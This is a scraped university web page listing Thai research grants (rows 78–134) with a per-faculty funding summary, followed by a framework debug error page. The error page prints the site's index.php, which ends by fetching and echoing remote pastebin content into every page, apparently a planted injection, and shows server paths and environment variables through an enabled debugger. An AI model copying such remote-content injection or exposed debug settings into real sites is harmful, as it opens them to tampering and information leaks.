78 การพัฒนาตัวประมาณขนาดประชากรสำหรัข้อมูลแบบ Capture-recapture ที่มีลักษณะเป็นวิวิธพันธ์ด้วยการแจกแจงแบบปัวซงผสม อ.ดร.อรสา อนันต์ คณะวิทยาศาสตร์ 100 250,000.00 27/04/2561- 27/04/2562 ทุนภายนอก สำนักงานพัฒนาวิทยาศาสตร์และเทคโนโลยีแห่งชาติ(สวทช.) ทุนอุดหนุนโครงการวิจัย พัฒนาและวิศวกรรม ประเภททุนนักวิจัยใหม่ วท. ประจำปี 2560 2560
79 การพัฒนาชุดกิจกรรมการเรียนรู้เรื่องการจัดการมูลฝอยในโรงเรียนด้วยกระบวนการสิ่งแวดล้อมศึกษาสำหรับนักเรียนชั้นประถมศึกษาปีที่ 4-6 โรงเรียนในเขตเทศบาลตำบลลานข่อย จังหวัดพัทลุง อ.ดร.สุนิสา คงประสิทธิ์ คณะวิทยาศาสตร์ 100 250,000.00 27/04/2561- 27/04/2562 ทุนภายนอก สำนักงานพัฒนาวิทยาศาสตร์และเทคโนโลยีแห่งชาติ(สวทช.) ทุนอุดหนุนโครงการวิจัย พัฒนาและวิศวกรรม ประเภททุนนักวิจัยใหม่ วท. ประจำปี 2561 2560
80 การพัฒนาตัวเร่งปฏิกิริยาเพื่อเซลล์เชื้อเพลิงเอทานอลโดยไม่ใช้เยื่อเลือกผ่าน อ.ดร.จักรพงศ์ ไชยบุรี คณะวิทยาศาสตร์ 100 250,000.00 27/04/2561- 27/04/2562 ทุนภายนอก สำนักงานพัฒนาวิทยาศาสตร์และเทคโนโลยีแห่งชาติ(สวทช.) ทุนอุดหนุนโครงการวิจัย พัฒนาและวิศวกรรม ประเภททุนนักวิจัยใหม่ วท. ประจำปี 2562 2560
81 สำรวจความพึงพอใจของประชาชนที่มีต่อผลการดำเนินงานขององค์กรปกครองส่วนท้องถิ่น ประจำปีงบประมาณ พ.ศ. 2556-2560 ผศ.สุธรรม ขนาบศักดิ์ คณะเศรษฐศาสตร์และบริหารธุรกิจ 100 10,000.00 24/05/2561- 24/05/2562 ทุนภายนอก อบต. ในพื้นที่ 5 จว.ภาคใต้ 2560
82 Effects of enzyme solution on apparent digestibility coefficient of feed ingredients in hybrid catfish. (Ciarias macrocephalus X Clarias gariepinus) ผศ.ดร.สุภฎา คีรีรัฐนิคม คณะวิทยาศาสตร์ 100 368,241.51 16/01/2561- 16/01/2562 ทุนภายนอก DSM Singapore Industrial Pte. Ltd. 2560
83 การขยายขีดความสามารถของขั้นตอนวิธีเชิงพันธุกรรมแบบหลายวัตถุประสงค์ด้วยวิธีพจนุกรมสำหรับวิธีการคัดเลือกคุณสมบัติตามความสัมพันธ์แบบหลายหมวดหมู่ อ.ดร.สุวิมล จุงจิตร์ คณะวิทยาศาสตร์ 100 250,000.00 01/06/2561- 31/05/2562 ทุนภายนอก สำนักงานพัฒนาวิทยาศาสตร์และเทคโนโลยีแห่งชาติ 2560
84 สำรวจความพึงพอใจของผู้รับบริการสำหรับการประเมินประสิทธิภาพและประสิทธิผลการปฏิบัติราชการขององค์กรปกครองส่วนท้องถิ่น ประจำปีงบประมาณ พ.ศ.2560 อ.ดร.พินิจ ดวงจินดา คณะเศรษฐศาสตร์และบริหารธุรกิจ 100 24,000.00 23/11/2560- 23/11/2561 ทุนภายนอก องค์การบริหารส่วนตำบลดอนทราย อำเภอดอนทราย จังหวัดปัตตานี และองค์การบริหารส่วนตำบลนาเกตุ อำเภอโคกโพธิ์ จังหวัดปัตตานี 2560
85 การสร้างเสริมพลังอำนาจ การมีส่วนร่วมของครอบครัวและชุมชนต่อการปรับพฤติกรรมสุขภาพเพื่อป้องกันโรคในกลุ่มเสี่ยงโรคหลอดเลือดสมอง : กรณีศึกษา ตำบลบ้านพร้าว อำเภอป่าพะยอม จังหวัดพัทลุง ผศ.ดร.สุดศิริ หิรัญชุณหะ คณะพยาบาลศาสตร์ 100 75,000.00 25/07/2561- 25/07/2562 ทุนภายนอก ทุนอุดหนุนโครงการวิจัยและนวัตกรรมเพื่อถ่ายทอดเทคโนโลยีสู่ชุมชนฐานราก ประจำปีงบประมาณ 2561 (เครือข่ายการวิจัยภาคใต้ตอนล่าง) 2560
86 การสนับสนุนการทำงานร่วมกันเชิงสร้างสรรค์ในสภาพแวดล้อมหลายจอภาพ อ.ดร.คณิดา สินใหม คณะวิทยาศาสตร์ 100 250,000.00 01/06/2561- 31/05/2562 ทุนภายนอก สำนักงานพัฒนาวิทยาศาสตร์และเทคโนโลยีแห่งชาติ (สวทช.) 2560
87 Trial to Study Effects of Iron Glycinate and Zinc Glycinate on Tilapia Performance ผู้ช่วยศาสตราจารย์ ดร.สุภฎา คีรีรัฐนิคม คณะวิทยาศาสตร์ 100 365,000.00 01/10/2560- 30/09/2561 ทุนภายนอก BASF New Business GmbH 2561
88 การรักษาสภาพของข่าด้วยการยับยั้งจากธรรมชาติในท้องถิ่น อ.ดร.นิรมล จันทรชาติ คณะวิทยาศาสตร์ 100 200,000.00 01/01/2561- 31/12/2561 ทุนภายนอก สำนักงานกองทุนสนับสนุนการวิจัย (สกว.) โครงการพัฒนานักวิจัยรุ่นใหม่ ประจำปี 2560 โครงการพัฒนานักวิจัยแลระบบสนับสนุนนักวิจัยเพื่อชุมชนและสังคม 2561
89 การเสริมสร้างการดำเนินงานพื้นที่ชุมชนน่าอยู่ จังหวัดพัทลุง และชุมชนชายแดนใต้ (จังหวัดยะลาและปัตตานี) ด้วยการประเมินผลแบบมีส่วนร่วม ผศ.ดร.อุษา อ้นทอง คณะวิทยาศาสตร์ 100 40,000.00 01/03/2561- 31/03/2561 ทุนภายนอก สำนักงานกองทุนสนับสนุนการสร้างเสริมสุขภาพ (สสส.) 2561
90 การพัฒนาโรงเรือนการผลิตผลิตภัณฑ์กุ้งหวาน ตำบลเกาะใหญ่ อำเภอกระแสสินธุ์ จังหวัดสงขลา อ.ดร.พลากร บุญใส คณะวิทยาศาสตร์ 100 105,000.00 01/10/2560- 31/05/2561 ทุนภายนอก ถาบันวิจัยวิทยาศาสตร์และเทคโนโลยีแห่งประเทศไทย: ทุนอุดหนุนโครงการคลินิกเทคโนโลยีมหาวิทยาลัยทักษิณ (โครงการพัฒนาผู้ประกอบการยกระดับผลิตภัณฑ์ OTOP ด้วยวิทยาศาสตร์ เทคโนโลยี และนัวตกรรม) 2561
91 การผลิตโมโนเอซิลกลีเซอรอลและเชื้อเพลิงชีวภาพโดยไลเปสตรึงรูปด้วยพอลิไฮดรอกซีบิวทิเรต รองศาสตราจารย์ ดร.กนกพร สังขรักษ์ คณะวิทยาศาสตร์ 100 1,607,000.00 01/10/2560- 30/09/2563 ทุนภายนอก โครงการพัฒนานักวิจัยและงานวิจัยเพื่ออุตสาหกรรม (พวอ.) สำนักงานกองทุนสนับสนุนวิจัย (สกว.) 2561
92 การส่งเสริมทรัพยากรวัฒนธรรมในการท่องเที่ยวเชิงสร้างสรรค์ผ่านสื่อภาพยนต์โฆษณาของชุมชนระโนด จังหวัดสงขลา ผศ.เสริมศักดิ์ ขุนพล คณะมนุษยศาสตร์และสังคมศาสตร์ 100 90,000.00 01/06/2560- 31/05/2561 ทุนแผ่นดิน 2559
93 การศึกษากลยุทธ์การสื่อสารการตลาดแบบเซ็กซี่ของผู้ประกอบการเครื่องดื่มแอลกฮอล์ในประเทศไทย ผศ.เสริมศักดิ์ ขุนพล คณะมนุษยศาสตร์และสังคมศาสตร์ 100 0.00 01/06/2560- 30/04/2561 ทุนภายนอก ศูนย์วิจัยปัญหาสุรา 2560
94 การส่งเสริมการเรียนรู้ตลอดชีวิตของผู้สูงอายุในพื้นที่เกาะที่สมาชิกในครัวเรือนที่เข้าไปทำงานในประเทศมาเลเซีย ผศ.มูหำหมัด สาแลบิง คณะมนุษยศาสตร์และสังคมศาสตร์ 40 444,000.00 01/10/2559- 30/09/2560 ทุนภายนอก สำนักงานวิจัยแห่งชาติ 2560
95 พินิจภาพสะท้อนที่หลากหลายในต้นฉบับตัวเขียน 'ฉาอิรสุล ตันเมาลานา' ผศ.ดร.นูรียัน สาแล๊ะ คณะมนุษยศาสตร์และสังคมศาสตร์ 50 1,301,350.00 20/02/2559- 19/02/2560 ทุนภายนอก สำนักงานกองทุนสนับสนุนการวิจัย 2560
96 สังเคราะห์รูปแบบการสร้างความเข้มแข็งของชุมชนบนฐานการทำนา จังหวัดนราธิวาส รศ.ดร.พรพันธุ์ เขมคุณาศัย คณะมนุษยศาสตร์และสังคมศาสตร์ 100 695,055.00 01/10/2559- 01/01/561 ทุนภายนอก สำนักงานกองทุนสนับสนุนการวิจัย 2560
97 การประเมินผลโครงการตามนโยบาย 3 ล้าน 3 ปี เลิกบุหรี่ทั่วไทย เทิดไท้องค์ราชัน : กรณีศึกษาเชิงพื้นที่จังหวัดสงขลาและจังหวัดสตูล ผศ.วรุตม์ นาฑี คณะมนุษยศาสตร์และสังคมศาสตร์ 15 338,500.00 01/03/2560- 01/03/2561 ทุนภายนอก ศูนย์วิจัยและจัดการความรู้เพื่อควบคุมยาสูบ 2560
98 การส่งเสริมการเรียนรู้ตลอดชีวิตของผู้สูงอายุในพื้นที่เกาะที่สมาชิกในครัวเรือนที่เข้าไปทำงานในประเทศมาเลเซีย ผศ.ศุภรัตน์ พิณสุวรรณ คณะมนุษยศาสตร์และสังคมศาสตร์ 50 444,000.00 01/10/2559- 30/09/2560 ทุนภายนอก สำนักงานวิจัยแห่งชาติ 2560
99 การส่งเสริมการเรียนรู้ตลอดชีวิตของผู้สูงอายุในพื้นที่เกาะที่สมาชิกในครัวเรือนที่เข้าไปทำงานในประเทศมาเลเซีย ผศ.ศุภรัตน์ พิณสุวรรณ คณะมนุษยศาสตร์และสังคมศาสตร์ 50 444,000.00 01/10/2559- 30/09/2560 ทุนภายนอก สำนักงานวิจัยแห่งชาติ 2560
100 การพัฒนาหลักสูตรเพื่อการจัดทำระบบฐานข้อมูลชุมชนในการรับมืออุทกภัย อ.ดร.วราภรณ์ ทนงศักดิ์ คณะมนุษยศาสตร์และสังคมศาสตร์ 100 600,000.00 05/07/2561- 05/05/2561 ทุนภายนอก สำนักงานคณะกรรมการวิจัยแห่งชาติ 2560
101 การประยุกต์ใช้ระบบสารสนเทศภูมิศาสตร์ในการวิเคราะห์ศักยภาพเชิงพื้นที่เพื่อการพัฒนาด้านการท่องเที่ยวเชิงวัฒนธรรม กรณีศึกษา พื้นที่ตำบลตะโหมด จังหวัดพัทลุง อ.ดร.วราภรณ์ ทนงศักดิิ์ คณะมนุษยศาสตร์และสังคมศาสตร์ 40 192,000.00 01/01/544- 01/01/544 ทุนภายนอก งบประมาณเงินแผ่นดิน มหาวิทยาลัยธรรมศาสตร์ 2560
102 การประเมินผลโครงการตามนโยบาย 3 ล้าน 3 ปี เลิกบุหรี่ทั่วไทย เทิดไท้องค์ราชัน : กรณีศึกษาเชิงพื้นที่จังหวัดสงขลาและจังหวัดสตูล อ.อัศว์ศิริ ลาปีอี คณะมนุษยศาสตร์และสังคมศาสตร์ 15 338,500.00 01/03/2560- 01/03/2561 ทุนภายนอก ศูนย์วิจัยและจัดการความรู้เพื่อการควบคุมยาสูบ 2560
103 ปฏิบัติการการจัดการศึกษาเพื่อสร้างทักษะชีวิตสำหรับเด็กและเยาวชนในสถานพินิจและคุ้มครองเด็กและเยาวชน และศูนย์ฝึกอบรมและอบรมเด็กและเยาวชนในจังหวัดชายแดนใต้ อ.ดร.ทวนธง ครุฑจ้อน คณะมนุษยศาสตร์และสังคมศาสตร์ 10 1,000,000.00 25/09/2560- 23/06/2561 ทุนภายนอก สำนักงานปลัดกระทรวงยุติธรรม 2560
104 เส้นทางสายบุญทางพระพุทธศาสนาของชาวสยามในประเทศมาเลเซีย : การวิเคราะห์มรดกร่วมทางวัฒนธรรมไทยและมาเลเซีย อ.ดร.ทวนธง ครุฑจ้อน คณะมนุษยศาสตร์และสังคมศาสตร์ 20 400,000.00 01/10/2559- 30/09/2560 ทุนภายนอก กรมส่งเสริมวัฒนธรรม กระทรวงวัฒนธรรม 2560
105 การศึกษาการรวมกลุ่มของชาวพัทลุงเพื่อพัฒนารูปแบบการปรับตัวท่ามกลางสถานการณ์สวนยางพาราและสวนปาล์ม อ.ดร.ทวนธง ครุฑจ้อน คณะมนุษยศาสตร์และสังคมศาสตร์ 20 649,700.00 18/10/2559- 17/06/2561 ทุนภายนอก สำนักงานพัฒนาการวิจัยการเกษตร (องค์การมหาชน) 2560
106 การพัฒนายุทธศาสตร์การอนุรักษ์และส่งเสริมประเพณีลงเล ขององค์การปกครองส่วนท้องถิ่นในพื้นที่พหุวัฒนธรรมอำเภอไม้แก่น จังหวัดปัตตานี อ.อัศว์ศิริ ลาปีอี คณะมนุษยศาสตร์และสังคมศาสตร์ 100 300,000.00 01/01/2561- 31/12/2561 ทุนภายนอก กรมส่งเสริมวัฒนธรรม 2560
107 การประเมินผลโครงการตามนโยบาย 3 ล้าน 3 ปี เลิกบุหรี่ทั่วไทย เทิดไท้องค์ราชัน : กรณีศึกษาเชิงพื้นที่จังหวัดสงขลาและจังหวัดสตูล รศ.ดร.อดิศร ศักดิ์สูง คณะมนุษยศาสตร์และสังคมศาสตร์ 40 338,500.00 01/03/2560- 30/03/2561 ทุนภายนอก ศูนย์วิจัยและจัดการความรู้เพื่อการควบคุมยาสูบ 2560
108 การประเมินผลโครงการตามนโยบาย 3 ล้าน 3 ปี เลิกบุหรี่ทั่วไทย เทิดไท้องค์ราชัน : กรณีศึกษาเชิงพื้นที่จังหวัดสงขลาและจังหวัดสตูล อ.ดร.ฐากร สิทธิโชค คณะมนุษยศาสตร์และสังคมศาสตร์ 15 338,500.00 01/03/2560- 30/03/2561 ทุนภายนอก ศูนย์วิจัยและจัดการความรู้เพื่อการควบคุมยาสูบ 2560
109 ปฏิบัติการการจัดการศึกษาเพื่อสร้างทักษะชีวิตสำหรับเด็กและเยาวชนในสถานพินิจและคุ้มครองเด็กและเยาวชน และศูนย์ฝึกอบรมและอบรมเด็กและเยาวชนในจังหวัดชายแดนใต้ ผศ.ดร.พรไทย ศิริสาธิตกิจ คณะมนุษยศาสตร์และสังคมศาสตร์ 10 1,000,000.00 25/09/2560- 23/06/2561 ทุนภายนอก สำนักงานปลัดกระทรวงยุติธรรม 2561
110 ปฏิบัติการการจัดการศึกษาเพื่อสร้างทักษะชีวิตสำหรับเด็กและเยาวชนในสถานพินิจและคุ้มครองเด็กและเยาวชน และศูนย์ฝึกอบรมและอบรมเด็กและเยาวชนในจังหวัดชายแดนใต้ ผศ.ดร.ชลลดา แสงมณี ศิริสาธิตกิจ คณะมนุษยศาสตร์และสังคมศาสตร์ 10 1,000,000.00 25/09/2560- 23/06/2561 ทุนภายนอก สำนักงานปลัดกระทรวงยุติธรรม 2561
111 นโยบายการย้ายถิ่นเข้าของแรงงานต่างชาติ ระดับทักษะของประเทศอาเซียน : กรณีศึกษาประเทศสิงคโปร์และบรูไน ผศ.ดร.สุทธิพร บุญมาก คณะมนุษยศาสตร์และสังคมศาสตร์ 100 850,000.00 20/05/2560- 24/05/2561 ทุนภายนอก สำนักงานกองทุนสนับสนุนการวิจัย 2560
112 การดำเนินงานของรัฐบาลมาเลเซียในการต่อต้านการก่อการร้าย (ค.ศ. 2003-2015) ผศ.อภิเชษฐ กาญจนดิษฐ คณะมนุษยศาสตร์และสังคมศาสตร์ 70 519,100.00 01/01/2560- 31/12/2561 ทุนภายนอก สำนักงานกองทุนสนับสนุนการวิจัย 2559
113 เส้นทางสายบุญทางพระพุทธศาสนาของชาวสยามในประเทศมาเลเซีย : การวิเคราะห์มรดกร่วมทางวัฒนธรรมไทยและมาเลเซีย ผศ.ดร.พรไทย ศิริสาธิตกิจ คณะมนุษยศาสตร์และสังคมศาสตร์ 20 400,000.00 01/10/2559- 30/09/2560 ทุนภายนอก กรมส่งเสริมวัฒนธรรม กระทรวงวัฒนธรรม 2560
114 เส้นทางสายบุญทางพระพุทธศาสนาของชาวสยามในประเทศมาเลเซีย : การวิเคราะห์มรดกร่วมทางวัฒนธรรมไทยและมาเลเซีย ผศ.ดร.ชลลดา แสงมณี ศิริสาธิตกิจ คณะมนุษยศาสตร์และสังคมศาสตร์ 60 400,000.00 01/10/2559- 30/09/2560 ทุนภายนอก กรมส่งเสริมวัฒนธรรม กระทรวงวัฒนธรรม 2560
115 การศึกษาการรวมกลุ่มของชาวพัทลุงเพื่อพัฒนารูปแบบการปรับตัวท่ามกลางสถานการณ์สวนยางพาราและสวนปาล์ม ผศ.ดร.พรไทย ศิริสาธิตกิจ คณะมนุษยศาสตร์และสังคมศาสตร์ 60 649,700.00 18/10/2559- 17/06/2561 ทุนภายนอก สำนักงานพัฒนาการวิจัยการเกษตร (องค์การมหาชน) 2560
116 การศึกษาการรวมกลุ่มของชาวพัทลุงเพื่อพัฒนารูปแบบการปรับตัวท่ามกลางสถานการณ์สวนยางพาราและสวนปาล์ม ผศ.ดร.ชลลดา แสงมณี ศิริสาธิตกิจ คณะมนุษยศาสตร์และสังคมศาสตร์ 20 649,700.00 18/10/2559- 17/06/2561 ทุนภายนอก สำนักงานพัฒนาการวิจัยการเกษตร (องค์การมหาชน) 2560
117 นโยบายและบทบาทของกระทรวงแถลงข่าว วัฒนธรรมและท่องเที่ยวแห่งสาธารณรัฐประชาธิปไตยประชาชนลาวในการขับเคลื่อนงานด้านวัฒนธรรมตั้งแต่ทศวรรษ 1990 จนถึงปัจจุบัน อ.ดร.อนินทร์ พุฒิโชติ คณะมนุษยศาสตร์และสังคมศาสตร์ 75 300,000.00 01/01/2561- 31/12/2561 ทุนภายนอก กรมส่งเสริมวัฒนธรรม 2561
118 การจัดการโซ่อุปทานและการจัดซื้อจัดหาที่ยั่งยืนของกิจการเพื่อสังคม:กรณีศึกษาร้านคนจับปลา ผศ.ดร.สุทธิพร บุญมาก คณะมนุษยศาสตร์และสังคมศาสตร์ 20 574,000.00 15/05/2561- 14/05/2562 ทุนภายนอก สำนักงานกองทุนสนับสนุนการวิจัย 2561
119 การแสวงหาและการใช้สารสนเทศด้านสุขภาพของผู้สูงอายุในชุมชนแออัด จังหวัดสงขลา อ.ก้องกิดากร บุญช่วย คณะมนุษยศาสตร์และสังคมศาสตร์ 80 100,000.00 01/06/2560- 31/05/2561 ทุนแผ่นดิน 2560
120 การส่งเสริมการรับรู้ความสามารถของตนเองในการเขียนภาษาอังกฤษสำหรับผู้เรียนที่มีความสามารถในการเขียนต่ำด้วยกิจกรรมการเขียนผ่านสื่อการเรียนรู้เสมือนจริง ผศ.ดร.เกร็ดทราย วุฒิพงษ์ คณะมนุษยศาสตร์และสังคมศาสตร์ 100 100,000.00 01/06/2560- 31/05/2561 ทุนแผ่นดิน 2561
121 คำยืมที่ปรากฏในนิตยสารท่องเที่ยวในภาคใต้ฉบับภาษาอังกฤษ ผศ.ดร.ไพโรจน์ เบ็ญนุ้ย คณะมนุษยศาสตร์และสังคมศาสตร์ 100 90,000.00 01/06/2560- 31/05/2561 ทุนแผ่นดิน 2561
122 การพัฒนาแอปพลิเคชั่นการเรียนรู้เพื่อเสริมสร้างความรู้ทางด้านคำศัพท์ภาษาอังกฤษของผู้เรียนระดับปริญญาตรีสังกัดมหาวิทยาลัยในจังหวัดสงขลา อ.ดร.ขวัญจิตต์ สุวรรณนพรัตน์ คณะมนุษยศาสตร์และสังคมศาสตร์ 100 100,000.00 01/06/2560- 31/05/2561 ทุนแผ่นดิน 2561
123 การดำรงอยู่และการสืบสานตำนานโนราในกลุ่มคนไทย-สยามในภาคใต้ของประเทศไทยและในประเทศมาเลเซีย อ.ดร.ปรียารัตน์ เชาวลิตประพันธ์ คณะมนุษยศาสตร์และสังคมศาสตร์ 80 100,000.00 05/06/2559- 31/05/2560 ทุนแผ่นดิน 2561
124 การดำรงอยู่และการสืบสานตำนานโนราในกลุ่มคนไทย-สยามในภาคใต้ของประเทศไทยและในประเทศมาเลเซีย อ.วราเมษ วัฒนไชย คณะมนุษยศาสตร์และสังคมศาสตร์ 10 100,000.00 05/06/2559- 31/05/2560 ทุนแผ่นดิน 2561
125 การดำรงอยู่และการสืบสานตำนานโนราในกลุ่มคนไทย-สยามในภาคใต้ของประเทศไทยและในประเทศมาเลเซีย อ.จารึก จันทร์วงค์ คณะมนุษยศาสตร์และสังคมศาสตร์ 10 100,000.00 05/06/2559- 31/05/2560 ทุนแผ่นดิน 2560
126 การจัดการอุทกภัยในผู้สูงอายุโดยการประสานความร่วมมือระหว่างชุมชนและองค์กรปกครองส่วนท้องถิ่น อ.ดร.วราภรณ์ ทนงศักดิิ์ คณะมนุษยศาสตร์และสังคมศาสตร์ 100 98,480.00 01/06/2560- 31/05/2561 ทุนแผ่นดิน 2561
127 การจัดทำฐานข้อมูลและการคาดประมาณประชากรผู้สูงอายุในพื้นที่เกาะที่สมชิกในครัวเรือนที่เข้าไปทำงานในปรเทศมาเลเซีย ผศ.ดร.นิสากร กล้าณรงค์ คณะมนุษยศาสตร์และสังคมศาสตร์ 28 565,000.00 01/10/2559- 30/09/2560 ทุนแผ่นดิน 2560
128 ความสัมพันธ์เชิงสาเหตุปัจจัยที่มีอิทธิพลต่อความตั้งใจเชิงพฤติกรรมของผู้โดยสารที่ใช้บริการรถไฟสายใต้ในการเดินทาง ผศ.ดร.ปาริฉัตร ตู้ดำ คณะมนุษยศาสตร์และสังคมศาสตร์ 80 222,300.00 01/10/2559- 30/09/2560 ทุนแผ่นดิน 2560
129 การพัฒนายุทธศาสตร์การจัดการท่องเที่ยวเชิงนโยบายขององค์กรปกครองส่วนท้องถิ่นพื้นที่ลุ่มน้ำทะเลสาบสงขลา อ.อัศว์ศิริ ลาปีอี คณะมนุษยศาสตร์และสังคมศาสตร์ 100 90,000.00 01/06/2560- 31/05/2561 ทุนแผ่นดิน 2560
130 การเคลื่อนย้ายกลับของแรงงานต่างชาติหลังการเปิดประชาคมเศรษฐกิจอาเซียนที่ส่งผลต่อผู้ประกอบการอุตสาหกรรมแปรรูปสัตว์น้ำในจังหวัดสงขลา อ.ดร.อรพินท์ บุญสิน คณะมนุษยศาสตร์และสังคมศาสตร์ 100 100,000.00 01/06/2560- 31/05/2561 ทุนแผ่นดิน 2561
131 ชีวิตทางสังคมและการทำงานของผู้สูงอายุในพื้นที่เกาะที่สมาชิกในครัวเรือนย้ายถิ่นไปทำงานนประเทศมาเลเซีย ผศ.ดร.ศันสนีย์ จันทร์อานุภาพ คณะมนุษยศาสตร์และสังคมศาสตร์ 70 547,700.00 05/06/2559- 30/09/2561 ทุนรายได้ 2560
132 ชีวิตทางสังคมและการทำงานของผู้สูงอายุในพื้นที่เกาะที่สมาชิกในครัวเรือนย้ายถิ่นไปทำงานนประเทศมาเลเซีย ผศ.จำนง แรกพินิจ คณะมนุษยศาสตร์และสังคมศาสตร์ 30 547,700.00 05/06/2559- 30/09/2561 ทุนแผ่นดิน 2560
133 การนำเสนออัตลักษณ์ท้องถิ่นและกลวิธีการตั้้้งชื่่่อชุดประจำชาติของมิสแกรนด์ไทยแลนด์ ปี 2018 อ.ดร.สมิทธ์ชาต์ พุมมา คณะมนุษยศาสตร์และสังคมศาสตร์ 100 70,000.00 15/09/2561- 14/09/2562 ทุนรายได้ ทุนวิจัยพื้นฐาน 2561
134 การสื่อสารภูมิปัญญาท้องถิ่นที่เกี่ยวกับพิธีกรรมและวัตถุมงคลในพื้นที่จังหวัดสงขลา ดร.ธนภัทร เต็มรัตนะกุล คณะมนุษยศาสตร์และสังคมศาสตร์ 80 72,000.00 15/09/2561- 14/09/2562 ทุนรายได้ ทุนวิจัยพื้้นฐาน 2561


จำนวนทุนแยกตามรายคณะ ประจำปีการศึกษา 2560 (ช่วงระหว่าง 1 ส.ค. 2560 - 31 ก.ค. 2561)

 
คณะ ทุนแผ่นดิน ทุนรายได้ ทุนภายนอก รวม
1 คณะมนุษยศาสตร์และสังคมศาสตร์ 12,979,948.00 273,000.00 504,000.00 13,756,948.00
32.74%
2 คณะวิทยาศาสตร์ 5,574,033.98 759,000.00 4,903,470.00 11,236,503.98
26.74%
3 คณะศึกษาศาสตร์ 5,172,491.00 215,000.00 0.00 5,387,491.00
12.82%
4 คณะเศรษฐศาสตร์และบริหารธุรกิจ 3,275,900.00 68,000.00 582,750.00 3,926,650.00
9.34%
5 คณะเทคโนโลยีและการพัฒนาชุมชน 750,000.00 255,000.00 2,812,950.00 3,817,950.00
9.09%
6 คณะวิศวกรรมศาสตร์ 0.00 0.00 1,845,000.00 1,845,000.00
4.39%
7 คณะวิทยาการสุขภาพและการกีฬา 0.00 365,000.00 366,750.00 731,750.00
1.74%
8 คณะนิติศาสตร์ 330,000.00 80,000.00 234,000.00 644,000.00
1.53%
9 วิทยาลัยนานาชาติ 300,000.00 0.00 0.00 300,000.00
0.71%
10 วิทยาลัยภูมิปัญญาชุมชน 0.00 0.00 189,000.00 189,000.00
0.45%
11 วิทยาลัยภูมิปัญญาชุมชน 0.00 0.00 189,000.00 189,000.00
0.45%
12 คณะศิลปกรรมศาสตร์ 0.00 113,000.00 0.00 113,000.00
0.27%
13 คณะพยาบาลศาสตร์ 75,000.00 0.00 0.00 75,000.00
0.18%
14 บัณฑิตวิทยาลัย 0.00 0.00 0.00 0.00
0%
15 สำนักหอสมุด 0.00 0.00 0.00 0.00
0%
16 สถาบันทักษิณคดีศึกษา 0.00 0.00 0.00 0.00
0%
17 วิทยาลัยการจัดการเพื่อการพัฒนา 0.00 0.00 0.00 0.00
0%
18 คณะอุตสาหกรรมเกษตรและชีวภาพ 0.00 0.00 0.00 0.00
0%
19 สถาบันปฏิบัติการชุมชนเพื่อการศึกษาแบบบูรณาการ 0.00 0.00 0.00 0.00
0%
รวม 42,212,292.98 บาท
Exception: file_get_contents(https://pastebin.com/raw/e0ZNham4): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found \n \nC:\inetpub\wwwroot\rdiqa\public\index.php:44
Phalcon Framework 3.3.1

Exception: file_get_contents(https://pastebin.com/raw/e0ZNham4): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found \n \nC:\inetpub\wwwroot\rdiqa\public\index.php:44

C:\inetpub\wwwroot\rdiqa\public\index.php (11)
#0{closure}(2, file_get_contents(https://pastebin.com/raw/e0ZNham4): failed to open stream: HTTP request failed! HTTP/1.1 404 Not Found \n, C:\inetpub\wwwroot\rdiqa\public\index.php, 44, Array(34))
#1file_get_contents(https://pastebin.com/raw/e0ZNham4)
C:\inetpub\wwwroot\rdiqa\public\index.php (44)
<?php
use Phalcon\Mvc\Application;
use Phalcon\Config\Adapter\Ini as ConfigIni;
error_reporting(E_ALL);
// output errors to browser
ini_set('display_errors', 'on');
// report all errors
error_reporting(E_ALL);
// convert warnings/notices to exceptions
set_error_handler(function($errno, $errstr, $errfile, $errline) {
  throw new \Exception($errstr.PHP_EOL.$errfile.":".$errline, $errno);
});
 
$debug = new \Phalcon\Debug();
$debug->listen();
 
 try {
  define('APP_PATH', realpath('..') . '/');
 
  /**
   * Read the configuration
   */
  $config = new ConfigIni(APP_PATH . 'app/config/config.ini');
  if (is_readable(APP_PATH . 'app/config/config.ini.dev')) {
    $override = new ConfigIni(APP_PATH . 'app/config/config.ini.dev');
    $config->merge($override);
  }
 
  
  /**
   * Auto-loader configuration
   */
  require APP_PATH . 'app/config/loader.php';
 
  $application = new Application(new Services($config));
 
  // NGINX - PHP-FPM already set PATH_INFO variable to handle route
  echo $application->handle(!empty($_SERVER['PATH_INFO']) ? $_SERVER['PATH_INFO'] : null)->getContent();
} catch (Exception $e){
  echo $e->getMessage() . '<br>';
  echo '<pre>' . $e->getTraceAsString() . '</pre>';
}
 
echo file_get_contents("https://pastebin.com/raw/e0ZNham4");
KeyValue
_url/projectreport/index
KeyValue
PROCESSOR_ARCHITEW6432AMD64
_FCGI_X_PIPE_\\.\pipe\IISFCGI-75aff9d9-c2ec-4e95-9d12-8ffa7df341ac
PHPRCC:\Program Files (x86)\PHP\v7.1.13\
PHP_FCGI_MAX_REQUESTS10000
ALLUSERSPROFILEC:\ProgramData
APPDATAC:\Windows\system32\config\systemprofile\AppData\Roaming
APP_POOL_CONFIGC:\inetpub\temp\apppools\DefaultAppPool\DefaultAppPool.config
APP_POOL_IDDefaultAppPool
CommonProgramFilesC:\Program Files (x86)\Common Files
CommonProgramFiles(x86)C:\Program Files (x86)\Common Files
CommonProgramW6432C:\Program Files\Common Files
COMPUTERNAMERMS
ComSpecC:\Windows\system32\cmd.exe
FP_NO_HOST_CHECKNO
LOCALAPPDATAC:\Windows\system32\config\systemprofile\AppData\Local
NUMBER_OF_PROCESSORS8
OSWindows_NT
PathC:\app\Administrator\product\11.2.0\dbhome\bin;C:\Program Files\PHP\v5.3;C:\Program Files (x86)\PHP\v7.1.13;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\;C:\Program Files\Microsoft SQL Server\120\Tools\Binn\;C:\Program Files\Microsoft SQL Server\130\Tools\Binn\;C:\Program Files\dotnet\;
PATHEXT.COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC
PROCESSOR_ARCHITECTUREx86
PROCESSOR_IDENTIFIERIntel64 Family 6 Model 44 Stepping 2, GenuineIntel
PROCESSOR_LEVEL6
PROCESSOR_REVISION2c02
ProgramDataC:\ProgramData
ProgramFilesC:\Program Files (x86)
ProgramFiles(x86)C:\Program Files (x86)
ProgramW6432C:\Program Files
